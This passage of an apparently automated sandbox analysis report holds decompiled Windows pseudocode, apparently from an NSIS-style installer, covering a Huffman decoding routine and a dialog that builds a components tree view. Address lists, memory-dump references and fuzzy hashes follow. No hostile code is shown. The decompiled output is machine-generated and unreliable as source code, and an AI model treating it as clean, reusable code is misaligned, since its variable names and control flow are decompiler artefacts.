                                                                                    						do {
                                                                                    							_t282 =  *_v32;
                                                                                    							if(_t282 == 0) {
                                                                                    								goto L61;
                                                                                    							}
                                                                                    							while(1) {
                                                                                    								_t283 = _t282 - 1;
                                                                                    								_t200 = _a28 + _t186;
                                                                                    								_v48 = _t283;
                                                                                    								_v24 = _t200;
                                                                                    								if(_v8 <= _t200) {
                                                                                    									goto L45;
                                                                                    								}
                                                                                    								L31:
                                                                                    								_v20 = _t283 + 1;
                                                                                    								do {
                                                                                    									_v16 = _v16 + 1;
                                                                                    									_t296 = _v28 - _v24;
                                                                                    									if(_t296 > _a28) {
                                                                                    										_t296 = _a28;
                                                                                    									}
                                                                                    									_t222 = _v8 - _v24;
                                                                                    									_t254 = 1 << _t222;
                                                                                    									if(1 <= _v20) {
                                                                                    										L40:
                                                                                    										_t256 =  *_a36;
                                                                                    										_t168 = 1 << _t222;
                                                                                    										_v40 = 1;
                                                                                    										_t274 = _t256 + 1;
                                                                                    										if(_t274 > 0x5a0) {
                                                                                    											goto L64;
                                                                                    										}
                                                                                    									} else {
                                                                                    										_t275 = _v32;
                                                                                    										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                                                    										if(_t222 >= _t296) {
                                                                                    											goto L40;
                                                                                    										}
                                                                                    										while(1) {
                                                                                    											_t222 = _t222 + 1;
                                                                                    											if(_t222 >= _t296) {
                                                                                    												goto L40;
                                                                                    											}
                                                                                    											_t275 = _t275 + 4;
                                                                                    											_t264 = _t263 + _t263;
                                                                                    											_t175 =  *_t275;
                                                                                    											if(_t264 <= _t175) {
                                                                                    												goto L40;
                                                                                    											}
                                                                                    											_t263 = _t264 - _t175;
                                                                                    										}
                                                                                    										goto L40;
                                                                                    									}
                                                                                    									_t168 = _a32 + _t256 * 4;
                                                                                    									_t297 = _t299 + _v16 * 4 - 0xec;
                                                                                    									 *_a36 = _t274;
                                                                                    									_t259 = _v16;
                                                                                    									 *_t297 = _t168;
                                                                                    									if(_t259 == 0) {
                                                                                    										 *_a24 = _t168;
                                                                                    									} else {
                                                                                    										_t276 = _v12;
                                                                                    										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                                                    										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                                                    										_a5 = _a28;
                                                                                    										_a4 = _t222;
                                                                                    										_t262 = _t276 >> _t186;
                                                                                    										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                                                    										 *(_t298 + _t262 * 4) = _a4;
                                                                                    									}
                                                                                    									_t224 = _v24;
                                                                                    									_t186 = _t224;
                                                                                    									_t225 = _t224 + _a28;
                                                                                    									_v24 = _t225;
                                                                                    								} while (_v8 > _t225);
                                                                                    								L45:
                                                                                    								_t284 = _v36;
                                                                                    								_a5 = _v8 - _t186;
                                                                                    								if(_t284 < 0x42d6a8 + _a8 * 4) {
                                                                                    									_t205 =  *_t284;
                                                                                    									if(_t205 >= _a12) {
                                                                                    										_t207 = _t205 - _a12 + _t205 - _a12;
                                                                                    										_v36 =  &(_v36[1]);
                                                                                    										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                                                    										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                                                    									} else {
                                                                                    										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                                                    										_t208 =  *_t284;
                                                                                    										_v36 =  &(_t284[1]);
                                                                                    									}
                                                                                    									_a6 = _t208;
                                                                                    								} else {
                                                                                    									_a4 = 0xc0;
                                                                                    								}
                                                                                    								_t286 = 1 << _v8 - _t186;
                                                                                    								_t244 = _v12 >> _t186;
                                                                                    								while(_t244 < _v40) {
                                                                                    									 *(_t168 + _t244 * 4) = _a4;
                                                                                    									_t244 = _t244 + _t286;
                                                                                    								}
                                                                                    								_t287 = _v12;
                                                                                    								_t246 = 1 << _v44;
                                                                                    								while((_t287 & _t246) != 0) {
                                                                                    									_t287 = _t287 ^ _t246;
                                                                                    									_t246 = _t246 >> 1;
                                                                                    								}
                                                                                    								_t288 = _t287 ^ _t246;
                                                                                    								_v20 = 1;
                                                                                    								_v12 = _t288;
                                                                                    								_t251 = _v16;
                                                                                    								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                                                    									L60:
                                                                                    									if(_v48 != 0) {
                                                                                    										_t282 = _v48;
                                                                                    										_t283 = _t282 - 1;
                                                                                    										_t200 = _a28 + _t186;
                                                                                    										_v48 = _t283;
                                                                                    										_v24 = _t200;
                                                                                    										if(_v8 <= _t200) {
                                                                                    											goto L45;
                                                                                    										}
                                                                                    										goto L31;
                                                                                    									}
                                                                                    									break;
                                                                                    								} else {
                                                                                    									goto L58;
                                                                                    								}
                                                                                    								do {
                                                                                    									L58:
                                                                                    									_t186 = _t186 - _a28;
                                                                                    									_t251 = _t251 - 1;
                                                                                    								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                                                    								_v16 = _t251;
                                                                                    								goto L60;
                                                                                    							}
                                                                                    							L61:
                                                                                    							_v8 = _v8 + 1;
                                                                                    							_v32 = _v32 + 4;
                                                                                    							_v44 = _v44 + 1;
                                                                                    						} while (_v8 <= _v28);
                                                                                    						goto L62;
                                                                                    					}
                                                                                    					_t277 = 0;
                                                                                    					do {
                                                                                    						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                                                    						_t277 = _t277 + 4;
                                                                                    						_t235 = _t235 - 1;
                                                                                    						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                                                    					} while (_t235 != 0);
                                                                                    					goto L21;
                                                                                    				}
                                                                                    				 *_a24 =  *_a24 & 0x00000000;
                                                                                    				 *_a28 =  *_a28 & 0x00000000;
                                                                                    				return 0;
                                                                                    			}











































































                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040726c
                                                                                    0x0040726f
                                                                                    0x00407270
                                                                                    0x00407272
                                                                                    0x00407278
                                                                                    0x0040727b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407281
                                                                                    0x00407282
                                                                                    0x00407285
                                                                                    0x00407288
                                                                                    0x0040728b
                                                                                    0x00407291
                                                                                    0x00407293
                                                                                    0x00407293
                                                                                    0x0040729b
                                                                                    0x0040729f
                                                                                    0x004072a4
                                                                                    0x004072c9
                                                                                    0x004072cf
                                                                                    0x004072d1
                                                                                    0x004072d3
                                                                                    0x004072d6
                                                                                    0x004072df
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004072a6
                                                                                    0x004072a6
                                                                                    0x004072af
                                                                                    0x004072b3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004072c4
                                                                                    0x004072c4
                                                                                    0x004072c7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004072b7
                                                                                    0x004072ba
                                                                                    0x004072bc
                                                                                    0x004072c0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004072c2
                                                                                    0x004072c2
                                                                                    0x00000000
                                                                                    0x004072c4
                                                                                    0x004072e8
                                                                                    0x004072ee
                                                                                    0x004072f8
                                                                                    0x004072fa
                                                                                    0x004072ff
                                                                                    0x00407301
                                                                                    0x00407337
                                                                                    0x00407303
                                                                                    0x00407303
                                                                                    0x00407306
                                                                                    0x00407309
                                                                                    0x00407313
                                                                                    0x00407316
                                                                                    0x0040731d
                                                                                    0x00407328
                                                                                    0x0040732f
                                                                                    0x0040732f
                                                                                    0x00407339
                                                                                    0x0040733c
                                                                                    0x0040733e
                                                                                    0x00407344
                                                                                    0x00407344
                                                                                    0x0040734d
                                                                                    0x00407350
                                                                                    0x00407355
                                                                                    0x00407364
                                                                                    0x0040736c
                                                                                    0x00407371
                                                                                    0x00407395
                                                                                    0x0040739d
                                                                                    0x004073a1
                                                                                    0x004073a7
                                                                                    0x00407373
                                                                                    0x00407381
                                                                                    0x00407384
                                                                                    0x0040738a
                                                                                    0x0040738a
                                                                                    0x004073ab
                                                                                    0x00407366
                                                                                    0x00407366
                                                                                    0x00407366
                                                                                    0x004073bc
                                                                                    0x004073c0
                                                                                    0x004073cc
                                                                                    0x004073c7
                                                                                    0x004073ca
                                                                                    0x004073ca
                                                                                    0x004073d4
                                                                                    0x004073d9
                                                                                    0x004073e1
                                                                                    0x004073dd
                                                                                    0x004073df
                                                                                    0x004073df
                                                                                    0x004073e7
                                                                                    0x004073e9
                                                                                    0x004073f0
                                                                                    0x004073fa
                                                                                    0x00407404
                                                                                    0x00407420
                                                                                    0x00407424
                                                                                    0x00407269
                                                                                    0x0040726f
                                                                                    0x00407270
                                                                                    0x00407272
                                                                                    0x00407278
                                                                                    0x0040727b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040727b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407406
                                                                                    0x00407406
                                                                                    0x00407406
                                                                                    0x0040740b
                                                                                    0x00407414
                                                                                    0x0040741d
                                                                                    0x00000000
                                                                                    0x0040741d
                                                                                    0x0040742a
                                                                                    0x0040742a
                                                                                    0x0040742d
                                                                                    0x00407434
                                                                                    0x00407437
                                                                                    0x00000000
                                                                                    0x0040725a
                                                                                    0x004071da
                                                                                    0x004071dc
                                                                                    0x004071dc
                                                                                    0x004071e0
                                                                                    0x004071e3
                                                                                    0x004071e4
                                                                                    0x004071e4
                                                                                    0x00000000
                                                                                    0x004071dc
                                                                                    0x00407150
                                                                                    0x00407156
                                                                                    0x00000000

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                                                    • Instruction ID: 8f207273dfcdbc59f762b6c847d1a58b94b1624b669f9e87ec0d9a9138a8e2bc
                                                                                    • Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                                                    • Instruction Fuzzy Hash: 0DC15A31E04259CBCF18CF68D4905EEBBB2BF98314F25826AD8567B380D734A942CF95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 96%
                                                                                    			E00404B80(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                                    				struct HWND__* _v8;
                                                                                    				struct HWND__* _v12;
                                                                                    				long _v16;
                                                                                    				signed int _v20;
                                                                                    				signed int _v24;
                                                                                    				intOrPtr _v28;
                                                                                    				signed char* _v32;
                                                                                    				int _v36;
                                                                                    				signed int _v44;
                                                                                    				int _v48;
                                                                                    				signed int* _v60;
                                                                                    				signed char* _v64;
                                                                                    				signed int _v68;
                                                                                    				long _v72;
                                                                                    				void* _v76;
                                                                                    				intOrPtr _v80;
                                                                                    				intOrPtr _v84;
                                                                                    				void* _v88;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				signed int _t203;
                                                                                    				intOrPtr _t206;
                                                                                    				intOrPtr _t207;
                                                                                    				long _t212;
                                                                                    				signed int _t216;
                                                                                    				signed int _t227;
                                                                                    				void* _t230;
                                                                                    				void* _t231;
                                                                                    				int _t237;
                                                                                    				long _t242;
                                                                                    				long _t243;
                                                                                    				signed int _t244;
                                                                                    				signed int _t250;
                                                                                    				signed int _t252;
                                                                                    				signed char _t253;
                                                                                    				signed char _t259;
                                                                                    				void* _t264;
                                                                                    				void* _t266;
                                                                                    				signed char* _t284;
                                                                                    				signed char _t285;
                                                                                    				long _t290;
                                                                                    				signed int _t300;
                                                                                    				signed int _t308;
                                                                                    				signed char* _t316;
                                                                                    				int _t320;
                                                                                    				int _t321;
                                                                                    				signed int* _t322;
                                                                                    				int _t323;
                                                                                    				long _t324;
                                                                                    				signed int _t325;
                                                                                    				long _t327;
                                                                                    				int _t328;
                                                                                    				signed int _t329;
                                                                                    				void* _t331;
                                                                                    
                                                                                    				_v12 = GetDlgItem(_a4, 0x3f9);
                                                                                    				_v8 = GetDlgItem(_a4, 0x408);
                                                                                    				_t331 = SendMessageA;
                                                                                    				_v24 =  *0x42f468;
                                                                                    				_v28 =  *0x42f434 + 0x94;
                                                                                    				_t320 = 0x10;
                                                                                    				if(_a8 != 0x110) {
                                                                                    					L23:
                                                                                    					if(_a8 != 0x405) {
                                                                                    						_t298 = _a16;
                                                                                    					} else {
                                                                                    						_a12 = 0;
                                                                                    						_t298 = 1;
                                                                                    						_a8 = 0x40f;
                                                                                    						_a16 = 1;
                                                                                    					}
                                                                                    					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                                    						_v16 = _t298;
                                                                                    						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
                                                                                    							if(( *0x42f43d & 0x00000002) != 0) {
                                                                                    								L41:
                                                                                    								if(_v16 != 0) {
                                                                                    									_t242 = _v16;
                                                                                    									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
                                                                                    										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
                                                                                    									}
                                                                                    									_t243 = _v16;
                                                                                    									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
                                                                                    										_t298 = _v24;
                                                                                    										_t244 =  *(_t243 + 0x5c);
                                                                                    										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
                                                                                    											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
                                                                                    										} else {
                                                                                    											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
                                                                                    										}
                                                                                    									}
                                                                                    								}
                                                                                    								goto L48;
                                                                                    							}
                                                                                    							if(_a8 == 0x413) {
                                                                                    								L33:
                                                                                    								_t298 = 0 | _a8 != 0x00000413;
                                                                                    								_t250 = E00404ACE(_v8, _a8 != 0x413);
                                                                                    								_t325 = _t250;
                                                                                    								if(_t325 >= 0) {
                                                                                    									_t99 = _v24 + 8; // 0x8
                                                                                    									_t298 = _t250 * 0x418 + _t99;
                                                                                    									_t252 =  *_t298;
                                                                                    									if((_t252 & 0x00000010) == 0) {
                                                                                    										if((_t252 & 0x00000040) == 0) {
                                                                                    											_t253 = _t252 ^ 0x00000001;
                                                                                    										} else {
                                                                                    											_t259 = _t252 ^ 0x00000080;
                                                                                    											if(_t259 >= 0) {
                                                                                    												_t253 = _t259 & 0x000000fe;
                                                                                    											} else {
                                                                                    												_t253 = _t259 | 0x00000001;
                                                                                    											}
                                                                                    										}
                                                                                    										 *_t298 = _t253;
                                                                                    										E0040117D(_t325);
                                                                                    										_a12 = _t325 + 1;
                                                                                    										_a16 =  !( *0x42f43c) >> 0x00000008 & 0x00000001;
                                                                                    										_a8 = 0x40f;
                                                                                    									}
                                                                                    								}
                                                                                    								goto L41;
                                                                                    							}
                                                                                    							_t298 = _a16;
                                                                                    							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                                    								goto L41;
                                                                                    							}
                                                                                    							goto L33;
                                                                                    						} else {
                                                                                    							goto L48;
                                                                                    						}
                                                                                    					} else {
                                                                                    						L48:
                                                                                    						if(_a8 != 0x111) {
                                                                                    							L56:
                                                                                    							if(_a8 == 0x200) {
                                                                                    								SendMessageA(_v8, 0x200, 0, 0);
                                                                                    							}
                                                                                    							if(_a8 == 0x40b) {
                                                                                    								_t230 =  *0x42a874;
                                                                                    								if(_t230 != 0) {
                                                                                    									ImageList_Destroy(_t230);
                                                                                    								}
                                                                                    								_t231 =  *0x42a888;
                                                                                    								if(_t231 != 0) {
                                                                                    									GlobalFree(_t231);
                                                                                    								}
                                                                                    								 *0x42a874 = 0;
                                                                                    								 *0x42a888 = 0;
                                                                                    								 *0x42f4a0 = 0;
                                                                                    							}
                                                                                    							if(_a8 != 0x40f) {
                                                                                    								L90:
                                                                                    								if(_a8 == 0x420 && ( *0x42f43d & 0x00000001) != 0) {
                                                                                    									_t321 = (0 | _a16 == 0x00000020) << 3;
                                                                                    									ShowWindow(_v8, _t321);
                                                                                    									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
                                                                                    								}
                                                                                    								goto L93;
                                                                                    							} else {
                                                                                    								E004011EF(_t298, 0, 0);
                                                                                    								_t203 = _a12;
                                                                                    								if(_t203 != 0) {
                                                                                    									if(_t203 != 0xffffffff) {
                                                                                    										_t203 = _t203 - 1;
                                                                                    									}
                                                                                    									_push(_t203);
                                                                                    									_push(8);
                                                                                    									E00404B4E();
                                                                                    								}
                                                                                    								if(_a16 == 0) {
                                                                                    									L75:
                                                                                    									E004011EF(_t298, 0, 0);
                                                                                    									_v36 =  *0x42a888;
                                                                                    									_t206 =  *0x42f468;
                                                                                    									_v64 = 0xf030;
                                                                                    									_v24 = 0;
                                                                                    									if( *0x42f46c <= 0) {
                                                                                    										L86:
                                                                                    										if( *0x42f42c == 4) {
                                                                                    											InvalidateRect(_v8, 0, 1);
                                                                                    										}
                                                                                    										_t207 =  *0x42ebfc; // 0x63d143
                                                                                    										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
                                                                                    											E00404A89(0x3ff, 0xfffffffb, E00404AA1(5));
                                                                                    										}
                                                                                    										goto L90;
                                                                                    									}
                                                                                    									_t322 = _t206 + 8;
                                                                                    									do {
                                                                                    										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                                                    										if(_t212 != 0) {
                                                                                    											_t300 =  *_t322;
                                                                                    											_v72 = _t212;
                                                                                    											_v76 = 8;
                                                                                    											if((_t300 & 0x00000001) != 0) {
                                                                                    												_v76 = 9;
                                                                                    												_v60 =  &(_t322[4]);
                                                                                    												_t322[0] = _t322[0] & 0x000000fe;
                                                                                    											}
                                                                                    											if((_t300 & 0x00000040) == 0) {
                                                                                    												_t216 = (_t300 & 0x00000001) + 1;
                                                                                    												if((_t300 & 0x00000010) != 0) {
                                                                                    													_t216 = _t216 + 3;
                                                                                    												}
                                                                                    											} else {
                                                                                    												_t216 = 3;
                                                                                    											}
                                                                                    											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
                                                                                    											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                                                    											SendMessageA(_v8, 0x110d, 0,  &_v76);
                                                                                    										}
                                                                                    										_v24 = _v24 + 1;
                                                                                    										_t322 =  &(_t322[0x106]);
                                                                                    									} while (_v24 <  *0x42f46c);
                                                                                    									goto L86;
                                                                                    								} else {
                                                                                    									_t323 = E004012E2( *0x42a888);
                                                                                    									E00401299(_t323);
                                                                                    									_t227 = 0;
                                                                                    									_t298 = 0;
                                                                                    									if(_t323 <= 0) {
                                                                                    										L74:
                                                                                    										SendMessageA(_v12, 0x14e, _t298, 0);
                                                                                    										_a16 = _t323;
                                                                                    										_a8 = 0x420;
                                                                                    										goto L75;
                                                                                    									} else {
                                                                                    										goto L71;
                                                                                    									}
                                                                                    									do {
                                                                                    										L71:
                                                                                    										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
                                                                                    											_t298 = _t298 + 1;
                                                                                    										}
                                                                                    										_t227 = _t227 + 1;
                                                                                    									} while (_t227 < _t323);
                                                                                    									goto L74;
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                                    							goto L93;
                                                                                    						} else {
                                                                                    							_t237 = SendMessageA(_v12, 0x147, 0, 0);
                                                                                    							if(_t237 == 0xffffffff) {
                                                                                    								goto L93;
                                                                                    							}
                                                                                    							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
                                                                                    							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
                                                                                    								_t324 = 0x20;
                                                                                    							}
                                                                                    							E00401299(_t324);
                                                                                    							SendMessageA(_a4, 0x420, 0, _t324);
                                                                                    							_a12 = _a12 | 0xffffffff;
                                                                                    							_a16 = 0;
                                                                                    							_a8 = 0x40f;
                                                                                    							goto L56;
                                                                                    						}
                                                                                    					}
                                                                                    				} else {
                                                                                    					_v36 = 0;
                                                                                    					 *0x42f4a0 = _a4;
                                                                                    					_v20 = 2;
                                                                                    					 *0x42a888 = GlobalAlloc(0x40,  *0x42f46c << 2);
                                                                                    					_t264 = LoadImageA( *0x42f420, 0x6e, 0, 0, 0, 0);
                                                                                    					 *0x42a87c =  *0x42a87c | 0xffffffff;
                                                                                    					_v16 = _t264;
                                                                                    					 *0x42a884 = SetWindowLongA(_v8, 0xfffffffc, E00405192);
                                                                                    					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
                                                                                    					 *0x42a874 = _t266;
                                                                                    					ImageList_AddMasked(_t266, _v16, 0xff00ff);
                                                                                    					SendMessageA(_v8, 0x1109, 2,  *0x42a874);
                                                                                    					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
                                                                                    						SendMessageA(_v8, 0x111b, _t320, 0);
                                                                                    					}
                                                                                    					DeleteObject(_v16);
                                                                                    					_t327 = 0;
                                                                                    					do {
                                                                                    						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
                                                                                    						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
                                                                                    							if(_t327 != 0x20) {
                                                                                    								_v20 = 0;
                                                                                    							}
                                                                                    							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E0040618A(0, _t327, _t331, 0, _t272)), _t327);
                                                                                    						}
                                                                                    						_t327 = _t327 + 1;
                                                                                    					} while (_t327 < 0x21);
                                                                                    					_t328 = _a16;
                                                                                    					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
                                                                                    					_push(0x15);
                                                                                    					E0040417B(_a4);
                                                                                    					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
                                                                                    					_push(0x16);
                                                                                    					E0040417B(_a4);
                                                                                    					_t329 = 0;
                                                                                    					_v16 = 0;
                                                                                    					if( *0x42f46c <= 0) {
                                                                                    						L19:
                                                                                    						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                                                    						goto L20;
                                                                                    					} else {
                                                                                    						_t316 = _v24 + 8;
                                                                                    						_v32 = _t316;
                                                                                    						do {
                                                                                    							_t284 =  &(_t316[0x10]);
                                                                                    							if( *_t284 != 0) {
                                                                                    								_v64 = _t284;
                                                                                    								_t285 =  *_t316;
                                                                                    								_v88 = _v16;
                                                                                    								_t308 = 0x20;
                                                                                    								_v84 = 0xffff0002;
                                                                                    								_v80 = 0xd;
                                                                                    								_v68 = _t308;
                                                                                    								_v44 = _t329;
                                                                                    								_v72 = _t285 & _t308;
                                                                                    								if((_t285 & 0x00000002) == 0) {
                                                                                    									if((_t285 & 0x00000004) == 0) {
                                                                                    										 *( *0x42a888 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                                                                    									} else {
                                                                                    										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
                                                                                    									}
                                                                                    								} else {
                                                                                    									_v80 = 0x4d;
                                                                                    									_v48 = 1;
                                                                                    									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                                                                    									_v36 = 1;
                                                                                    									 *( *0x42a888 + _t329 * 4) = _t290;
                                                                                    									_v16 =  *( *0x42a888 + _t329 * 4);
                                                                                    								}
                                                                                    							}
                                                                                    							_t329 = _t329 + 1;
                                                                                    							_t316 =  &(_v32[0x418]);
                                                                                    							_v32 = _t316;
                                                                                    						} while (_t329 <  *0x42f46c);
                                                                                    						if(_v36 != 0) {
                                                                                    							L20:
                                                                                    							if(_v20 != 0) {
                                                                                    								E004041B0(_v8);
                                                                                    								goto L23;
                                                                                    							} else {
                                                                                    								ShowWindow(_v12, 5);
                                                                                    								E004041B0(_v12);
                                                                                    								L93:
                                                                                    								return E004041E2(_a8, _a12, _a16);
                                                                                    							}
                                                                                    						}
                                                                                    						goto L19;
                                                                                    					}
                                                                                    				}
                                                                                    			}

                                                                                    0x00404fa4
                                                                                    0x00404fa6
                                                                                    0x00404fad
                                                                                    0x00404fb0
                                                                                    0x00404fb0
                                                                                    0x00404fb6
                                                                                    0x00404fbd
                                                                                    0x00404fc0
                                                                                    0x00404fc0
                                                                                    0x00404fc6
                                                                                    0x00404fcc
                                                                                    0x00404fd2
                                                                                    0x00404fd2
                                                                                    0x00404fdf
                                                                                    0x0040513f
                                                                                    0x00405146
                                                                                    0x00405163
                                                                                    0x00405169
                                                                                    0x0040517b
                                                                                    0x0040517b
                                                                                    0x00000000
                                                                                    0x00404fe5
                                                                                    0x00404fe7
                                                                                    0x00404fec
                                                                                    0x00404ff1
                                                                                    0x00404ff6
                                                                                    0x00404ff8
                                                                                    0x00404ff8
                                                                                    0x00404ff9
                                                                                    0x00404ffa
                                                                                    0x00404ffc
                                                                                    0x00404ffc
                                                                                    0x00405004
                                                                                    0x00405045
                                                                                    0x00405047
                                                                                    0x00405057
                                                                                    0x0040505a
                                                                                    0x0040505f
                                                                                    0x00405066
                                                                                    0x00405069
                                                                                    0x0040510b
                                                                                    0x00405113
                                                                                    0x0040511b
                                                                                    0x0040511b
                                                                                    0x00405121
                                                                                    0x00405129
                                                                                    0x0040513a
                                                                                    0x0040513a
                                                                                    0x00000000
                                                                                    0x00405129
                                                                                    0x0040506f
                                                                                    0x00405072
                                                                                    0x00405078
                                                                                    0x0040507d
                                                                                    0x0040507f
                                                                                    0x00405081
                                                                                    0x00405087
                                                                                    0x0040508e
                                                                                    0x00405093
                                                                                    0x0040509a
                                                                                    0x0040509d
                                                                                    0x0040509d
                                                                                    0x004050a4
                                                                                    0x004050b0
                                                                                    0x004050b4
                                                                                    0x004050b6
                                                                                    0x004050b6
                                                                                    0x004050a6
                                                                                    0x004050a8
                                                                                    0x004050a8
                                                                                    0x004050d6
                                                                                    0x004050e2
                                                                                    0x004050f1
                                                                                    0x004050f1
                                                                                    0x004050f3
                                                                                    0x004050f6
                                                                                    0x004050ff
                                                                                    0x00000000
                                                                                    0x00405006
                                                                                    0x00405011
                                                                                    0x00405014
                                                                                    0x00405019
                                                                                    0x0040501b
                                                                                    0x0040501f
                                                                                    0x0040502f
                                                                                    0x00405039
                                                                                    0x0040503b
                                                                                    0x0040503e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405021
                                                                                    0x00405021
                                                                                    0x00405027
                                                                                    0x00405029
                                                                                    0x00405029
                                                                                    0x0040502a
                                                                                    0x0040502b
                                                                                    0x00000000
                                                                                    0x00405021
                                                                                    0x00405004
                                                                                    0x00404fdf
                                                                                    0x00404f22
                                                                                    0x00000000
                                                                                    0x00404f38
                                                                                    0x00404f42
                                                                                    0x00404f47
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404f59
                                                                                    0x00404f5e
                                                                                    0x00404f6a
                                                                                    0x00404f6a
                                                                                    0x00404f6c
                                                                                    0x00404f7b
                                                                                    0x00404f7d
                                                                                    0x00404f81
                                                                                    0x00404f84
                                                                                    0x00000000
                                                                                    0x00404f84
                                                                                    0x00404f22
                                                                                    0x00404bd6
                                                                                    0x00404bd9
                                                                                    0x00404bdc
                                                                                    0x00404bec
                                                                                    0x00404bff
                                                                                    0x00404c0a
                                                                                    0x00404c10
                                                                                    0x00404c1e
                                                                                    0x00404c31
                                                                                    0x00404c36
                                                                                    0x00404c41
                                                                                    0x00404c4a
                                                                                    0x00404c60
                                                                                    0x00404c70
                                                                                    0x00404c7c
                                                                                    0x00404c7c
                                                                                    0x00404c81
                                                                                    0x00404c87
                                                                                    0x00404c89
                                                                                    0x00404c8c
                                                                                    0x00404c91
                                                                                    0x00404c96
                                                                                    0x00404c98
                                                                                    0x00404c98
                                                                                    0x00404cb8
                                                                                    0x00404cb8
                                                                                    0x00404cba
                                                                                    0x00404cbb
                                                                                    0x00404cc0
                                                                                    0x00404cc6
                                                                                    0x00404cca
                                                                                    0x00404ccf
                                                                                    0x00404cd7
                                                                                    0x00404cdb
                                                                                    0x00404ce0
                                                                                    0x00404ce5
                                                                                    0x00404ced
                                                                                    0x00404cf0
                                                                                    0x00404dbf
                                                                                    0x00404dd2
                                                                                    0x00000000
                                                                                    0x00404cf6
                                                                                    0x00404cf9
                                                                                    0x00404cfc
                                                                                    0x00404cff
                                                                                    0x00404cff
                                                                                    0x00404d04
                                                                                    0x00404d0d
                                                                                    0x00404d10
                                                                                    0x00404d14
                                                                                    0x00404d17
                                                                                    0x00404d1a
                                                                                    0x00404d23
                                                                                    0x00404d2c
                                                                                    0x00404d2f
                                                                                    0x00404d32
                                                                                    0x00404d35
                                                                                    0x00404d73
                                                                                    0x00404d9e
                                                                                    0x00404d75
                                                                                    0x00404d84
                                                                                    0x00404d84
                                                                                    0x00404d37
